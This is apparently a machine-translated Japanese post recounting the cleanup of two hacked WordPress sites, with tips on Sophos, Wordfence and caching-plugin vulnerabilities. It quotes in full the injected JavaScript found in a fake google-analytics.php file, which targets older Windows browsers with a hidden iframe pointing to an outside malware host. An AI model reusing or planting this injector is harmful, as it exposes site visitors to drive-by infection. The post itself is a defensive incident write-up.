明確にしましょう。ブラックリストには2つのサイトが一度にあり、そのうちの1つは2番目のサブドメインでした。次に、トロイの木馬の結果として両方で発生した変換について説明します。
そして、これは何が起こったかです:
header.php(サブドメイン)ファイルに2つのスクリプトが登場し、
そして
、
前のfooter.php(サブドメイン)ファイル-ligaexpressへのリンクを含むスクリプト、
また、親サイト(ドメイン)のwp-includesフォルダーには、次のコードで終わるgoogle-analytics.phpファイルがあります。
function showBrowVer() { var data = browserDetectNav(); if (data[0]) { if ((data[0] == 'Opera' || data[0] == 'MSIE'|| (data[0] == 'Firefox' & data[1] <= 17)) & data[3] == 'Windows'){ var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://moradomedia.nl/new/php/one-style.php'; js_kod2.width = '2px'; js_kod2.height = '2px'; js_kod2.style = 'visibility: hidden;'; document.body.appendChild(js_kod2); } } }
奇妙なことに、js_kod2.srcリンクは定期的に変更されました。
また、そのソフォスに加えて、使用されたアンチウイルスがどれも何も見つけられなかったことにも興味があります。 サイト上でも、コンピューター上でも、サイトをいじってから確認することにしました。 しかし、ソフォスのユーティリティVirus Removal Toolは、Troj / JSRedir-LKに加えてTroj / JSRedir-JKを、両方ともインターネット一時ファイルに発見しました。 私が今、あらゆる方法でそれを推奨していることについて[1]。
WordPress用のWordfence Securityプラグインもお勧めします[2]。 彼は、テーマファイルやプラグインファイルを含むファイルをスキャンし、WordPress.orgに保存されているファイルと比較する機能に魅了されました。 インストールされてスキャンが開始されるまでに、余分なものがすべて削除されているのは残念です。
また、WordPressについて(この記事のトピックで言及されているのと同じ脆弱性について)。
ウイルスが侵入した穴を探しているときに、リモートユーザーが任意のオブジェクトを挿入して実行できるようにするキャッシングプラグイン(WP Super Cache 1.2以前、W3 Total Cache 0.9.2.8以前)で脆弱性が発見されたという情報を見つけました。 PHPコード。 これについての詳細は、[3]と[4]で読むことができます。
足を暖かく保ち、プラグインを更新してください。 ああ、Total Commanderにftpパスワードを保存しないでください。
ご清聴ありがとうございました。
本文に記載されているものへの参照:
1. ソフォスのウイルス駆除ツール(無料)
2. WordPress用のWordfenceセキュリティプラグイン
3. WordPressのプラグインをキャッシュするsecuritylab.ruに危険な脆弱性が発見されました
4. mfuncの問題